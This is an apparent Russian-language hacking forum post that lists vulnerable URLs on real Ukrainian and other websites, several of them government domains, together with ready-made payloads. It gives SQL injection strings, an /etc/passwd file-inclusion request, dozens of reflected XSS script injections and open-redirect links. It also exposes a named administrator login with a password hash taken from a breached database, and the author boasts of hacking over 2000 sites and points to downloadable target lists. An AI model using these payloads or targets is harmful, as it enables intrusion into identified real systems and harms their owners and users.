https://sewel.ua/bitrix/redirect.php?event1=Lamoda go&event2=&event3=&goto=http%3a%2f%2fwww.google.com
https://www.petrostyle.com/bitrix/redirect.php?event1=&event2=&event3=&goto=http%3a%2f%2fwww.google.com
http://nsuem.com/bitrix/redirect.php?event1=watch full movie online&event2=arbicon&event3=&goto=http%3a%2f%2fwww.google.com
https://cis-geology.org/bitrix/redirect.php?event1=resource-BD_GGK-webmapget&event2=&event3=&goto=http%3a%2f%2fwww.google.com
http://www.vco.su/bitrix/rk.php?id=114&site_id=s1&event1=banner&event2=click&event3=68 / [114] [MIDDLE] &goto=http%3a%2f%2fwww.google.com
http://www.multura.com/bitrix/rk.php?id=78&event1=banner&event2=click&event3=1 / [78] [index_games_left] &goto=http%3a%2f%2fwww.google.com
https://www.buybrandexpo.com/bitrix/rk.php?id=186&event1=banner&event2=click&event3=1 / [186] [lentright] adggroup &goto=http%3a%2f%2fwww.google.com
http://stoik.com/bitrix/redirect.php?event1=michigangirl.w.skve.org3Fa[]=<a3Dhttps2F/tinyurl.com3Etinyurl.com</a>&event2=SVC&event3=&goto=http%3a%2f%2fwww.google.com
https://prozakazi.com/bitrix/redirect.php?event1=&event2=https://ica.company/?ref=58&event3=СПЕЦПРЕДЛОЖЕНИЕ | Займы на покупку квартиры.&goto=http%3a%2f%2fwww.google.com
http://www.avclub.pro/bitrix/rk.php?id=1085&site_id=s1&event1=banner&event2=click&event3=81 / [1085] [MIDDLE] poz7 Контракт BenQ weeks36-39&goto=http%3a%2f%2fwww.google.com
https://intranet.oursson.com/bitrix/system.php?id=149&site_id=s1&event1=banner&event2=click&event3=1 / [149] [INDEX_TOP_rus_ru] Korea Wok! &goto=http%3a%2f%2fwww.google.com
http://www.auto-sib.com/bitrix/rk.php?id=594&event1=banner&event2=click&event3=1+%2F+%5B594%5D+%5Btests2%5D+%C2%EE%F1%F2%EE%EA+%F8%E8%ED%E0+%C0%E2%F2%EE%F8%E8%ED%FB+&goto=http%3a%2f%2fwww.google.com
https://www.controller-stellen.de/bitrix/redirect.php?event1=KD18418&event2=https://www.management-forum.de/konferenzen-seminare/termin/seminar-finanzwissen-fuer-geschaeftsfuehrer-26-10-2020/&event3=Frankfurt/M.&goto=http%3a%2f%2fwww.google.com
https://marketplace.web-industry.pro/bitrix/redirect.php?event1=news_out&event2=https://ichip.ru/sovety/kakojj-lan-kabel-vybrat-dlya-domashnego-ispolzovaniya-136940&event3=Какой LAN-кабель выбрать для домашнего использования?&goto=http%3a%2f%2fwww.google.com
Сайты в доменной зоне УКР. В этих доменах мало того что наверно некто не искал уязвимость, про них вообще мало кто знает.
RFI в доменах УКР:
Код:
https://х.укр/redirect/?go=http%3a%2f%2fwww.google.com
http://мій.конспект.укр/go.php?site=http%3a%2f%2fwww.google.com
SQL в УКР доменах
Код:
https://мошенники.укр/search?id=6943' and [t] and '1'='1
x99167ro_losewn
В таблице bm Moshenniki 14459 строк
В таблице bm admin написано логин admin Лосев Николай и пароль зашифрован:
2f7b52aacfbf6f44e13d27656ecb1f5'
На расшифровку время не тратил.
https://дропшиппинг.бренды.укр/index.php?route=product/product&product_id=143825' and [t] and '1'='1
193 таблицы в базе.
XSS в УКР доменах:
Код:
https://гранитные-памятники.укр/index.php?route="><script >alert(String.fromCharCode(88,83,83))</script>&path=72_96
https://турпоиск.укр/online#!f=1&t="><script >alert(String.fromCharCode(88,83,83))</script>&i=79&y=country&c=2020-12-26&v=2021-01-01&l=8&page=form
Раз задел УКР домены, то конечно я заглянул и на UA:
LFI уязаимость в домене UA:
Код:
https://www.rpa.ua/html/ru/products/index.php?product=/etc/passwd&catId=27&name=Разъединитель секционный однополюсный РТИ-39
RFI уязвимости в доменах UA:
Код:
http://show.pp.ua/go/?url=http%3a%2f%2fwww.google.com
https://search.com.ua/go?go=http%3a%2f%2fwww.google.com
https://unix.ck.ua/index.php?q=http%3a%2f%2fwww.google.com
http://dotu.org.ua/url.php?url=http%3a%2f%2fwww.google.com
http://sport.sumy.ua/go.php?url=http%3a%2f%2fwww.google.com
http://itshop.od.ua/out.php?link=http%3a%2f%2fwww.google.com
http://map.lugansk.ua/away.php?to=http%3a%2f%2fwww.google.com
http://party.com.ua/ajax.php?link=http%3a%2f%2fwww.google.com
http://ww.etag.com.ua/redirect?url=http%3a%2f%2fwww.google.com
http://ekonomka.dn.ua/out.php?link=http%3a%2f%2fwww.google.com
http://bereznyj.com.ua/redirect?url=http%3a%2f%2fwww.google.com
http://avtosalon.in.ua/goto.php?url=http%3a%2f%2fwww.google.com
http://today.od.ua/redirect.php?url=http%3a%2f%2fwww.google.com
https://ukrface.com.ua/away.php?url=http%3a%2f%2fwww.google.com
https://www.std.com.ua/out.php?link=http%3a%2f%2fwww.google.com
https://www.smila.in.ua/out.php?link=http%3a%2f%2fwww.google.com
http://cadastr.lutsk.ua/out.php?link=http%3a%2f%2fwww.google.com
https://goodnight.dn.ua/outer.php?link=http%3a%2f%2fwww.google.com
http://health-media.com.ua/out.php?link=http%3a%2f%2fwww.google.com
https://white-blue.kiev.ua/goto.php?url=http%3a%2f%2fwww.google.com
http://k504.xai.edu.ua/fcounter.php?book=http%3a%2f%2fwww.google.com
http://www.sma.ua/index.php?id=57&type=0&jumpurl=http%3a%2f%2fwww.google.com
http://www.fcdynamo.kiev.ua/banner.php?id=1276&url=http%3a%2f%2fwww.google.com
http://biblioteka-en.org.ua/wp-blog/7/search.php?q=http%3a%2f%2fwww.google.com
http://pereviznyk.ua/img/b/c.php?pid=5&bid=224&burl=http%3a%2f%2fwww.google.com
https://sewel.ua/bitrix/redirect.php?event1=Lamoda go&event2=&event3=&goto=http%3a%2f%2fwww.google.com
https://karuzo.ua/index.php?route=common/language/language&code=en&redirect=http%3a%2f%2fwww.google.com
https://plitkashop.com.ua/cart/add2cart.php?cartid=583570590&size=м2 — 459 грн&kolichestvo=1&thango=http%3a%2f%2fwww.google.com
http://www.proffionline.com.ua/UPAKOVKA/index.php?path=%CA%CE%CD%C2%C5%D0%D2%DB_%C1%C0%CD%C4%C5%D0%CE%CB%DC%CD%DB%C5_AIRPOC,_Mail_Lite.php&page=http%3a%2f%2fwww.google.com&num_p=2
XSS уязвимости в доменах UA:
Код:
https://sz.ua/index.php?route="><script >alert(String.fromCharCode(88,83,83))</script>&path=1784_4996
https://biker.dp.ua/index.php?route="><script >alert(String.fromCharCode(88,83,83))</script>&path=1_3138
http://torrents.te.ua/details.php?id=144&filelist="><script >alert(String.fromCharCode(88,83,83))</script>
https://gioc.uz.gov.ua/files/video/{id}.webm?lang="><script >alert(String.fromCharCode(88,83,83))</script>
https://office-master.biz.ua/index.php?route="><script >alert(String.fromCharCode(88,83,83))</script>&page=2
http://www.vijtivci.km.ua/print.php?type="><script >alert(String.fromCharCode(88,83,83))</script>&item_id=16
http://www.ggj.org.ua/search?updated-max="><script >alert(String.fromCharCode(88,83,83))</script>&max-results=7
http://www.bei.org.ua/search?updated-max="><script >alert(String.fromCharCode(88,83,83))</script>&max-results=3
http://www.tp-link.ua/products/details/?categoryid=&model="><script >alert(String.fromCharCode(88,83,83))</script>
https://petronas-shop.com.ua/index.php?route="><script >alert(String.fromCharCode(88,83,83))</script>&download_id=154
https://concert.ua/uk/catalog/all-cities/all-categories/style="><script >alert(String.fromCharCode(88,83,83))</script>
https://stroysmeta.com.ua/print.php?type="><script >alert(String.fromCharCode(88,83,83))</script>&thread=473&rowstart=0
https://old.gp.gov.ua/ua/news.html?_m="><script >alert(String.fromCharCode(88,83,83))</script>&_t=rec&id=112678&fp=8270
https://it-help.pp.ua/infusions/booklib/book.php?book_id=3&action="><script >alert(String.fromCharCode(88,83,83))</script>
http://www.fitodoctor.dn.ua/index.php/prodtovar?page="><script >alert(String.fromCharCode(88,83,83))</script>&category_id=35
http://val.zp.ua/go.php?http://www.urbandictionary.com/define.php?term="><script >alert(String.fromCharCode(88,83,83))</script>
https://marketnet.com.ua/index.php?route="><script >alert(String.fromCharCode(88,83,83))</script>&cpath=4&oct_blog_article_id=68
https://creditkasa.ua/?transaction_id="><script >alert(String.fromCharCode(88,83,83))</script>&affiliate_id=47493&platform_id=110034
https://elearning.uz.gov.ua/admin/tool/policy/view.php?versionid=2&returnurl="><script >alert(String.fromCharCode(88,83,83))</script>
http://auto.pp.ua/newauto/testdrive/?marka_id="><script >alert(String.fromCharCode(88,83,83))</script>&model_id={modelId}&year={year}
https://city-adm.lviv.ua/services/index.php?option="><script >alert(String.fromCharCode(88,83,83))</script>&task=att_download&link_id=821&cf_id=24
https://www.aukro.ua/show_item.php?item=1009127574&utm_source="><script >alert(String.fromCharCode(88,83,83))</script>&utm_medium=start_date_22.04.10&utm_camp aign=goods_link
https://stozhary.net.ua/search?GoodSearch[name]=КОРОЛІВСЬКИЙ СМАК&GoodSearch[cat1_id]="><script >alert(String.fromCharCode(88,83,83))</script>&sort=price_asc&page=4&per-page=24
http://auto.join.ua/uk/newauto/auto-fiat-tipo-1848135.html?utm_source="><script >alert(String.fromCharCode(88,83,83))</script>&utm_medium=whitelabel_id&utm_campaign=cobrand&r_audience=affiliate_buyers&r_source=auto.join.ua&r_medium=whitelabel&r_campaign=whitelabel_99&r_options=rotator
В обще сложности я нашел уязвимости на более чем 2000 сайтов. Вроде взломал сайты почти всех стран мира, затронул все государства.. Вышло что-то вроде интернет сталкинга... Если вы посетите как турист какую либо страну на 1 месяц, да даже если вы там всю жизнь живете - вы не как не сможете узнать столько информации об этой стране, как если вы взломаете сайты заводов и предприятий страны. Просматривая инфраструктуру разных городов, стран, островов ... я понял что живу в очень нищей стране, да и вообще мир наш - фигня. В общем возвращаюсь на свою прежнюю работу в колл центр 28 января, нет времени продолжать взламывать сайты дальше... я конечно буду пробовать продолжать взламывать что-то, но по понятным причинам темп взломов уже будет совсем не тот.
скачать список сайтов с уязвимостями на данный момент можно по ссылкам:
SQLi: Для просмотра ссылки Войди
RFI, XSS, LFI: Для просмотра ссылки Войди